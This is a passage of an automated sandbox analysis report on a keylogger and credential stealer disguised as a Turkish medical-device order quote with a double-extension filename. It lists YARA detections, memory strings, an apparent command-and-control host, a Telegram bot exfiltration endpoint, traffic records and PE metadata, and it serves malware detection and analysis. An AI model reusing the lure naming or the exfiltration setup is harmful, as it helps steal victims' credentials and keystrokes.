                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F82000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3786383841.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3782735191.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49809 version: TLS 1.2
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_01253E341_2_01253E34
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_0125E1241_2_0125E124
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_01256F901_2_01256F90
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_062236681_2_06223668
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_062212401_2_06221240
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_062241281_2_06224128
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_0622123B1_2_0622123B
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_062211F81_2_062211F8
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A94601_2_079A9460
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A4B2F1_2_079A4B2F
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A4B401_2_079A4B40
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A4F781_2_079A4F78
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A34981_2_079A3498
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A34891_2_079A3489
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A2C281_2_079A2C28
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 1_2_079A30601_2_079A3060
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_00F3B6306_2_00F3B630
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_00F350886_2_00F35088
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_00F3E4B06_2_00F3E4B0
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_00F3E4A06_2_00F3E4A0
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124C1466_2_0124C146
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_012453626_2_01245362
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124D2D76_2_0124D2D7
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124D5A36_2_0124D5A3
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124C4736_2_0124C473
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124C7386_2_0124C738
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_012469AF6_2_012469AF
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124CD336_2_0124CD33
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124EC186_2_0124EC18
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124CFF76_2_0124CFF7
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_01246FC86_2_01246FC8
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_01243E096_2_01243E09
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_012429EC6_2_012429EC
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124F8096_2_0124F809
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_01243AB16_2_01243AB1
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124EC0F6_2_0124EC0F
                    Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeCode function: 6_2_0124FC606_2_0124FC60
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1338593601.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1345973400.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1348199611.0000000008DC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1340718168.0000000002D0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000000.1314228332.0000000000906000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamekDme.exeJ vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003D0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003D0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780842642.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dll1q vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.3788652081.0000000006F79000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeBinary or memory string: OriginalFilenamekDme.exeJ vs fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 6.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3ec15b8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000006.00000002.3780343381.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1343434926.0000000003E7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3e7eb98.2.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
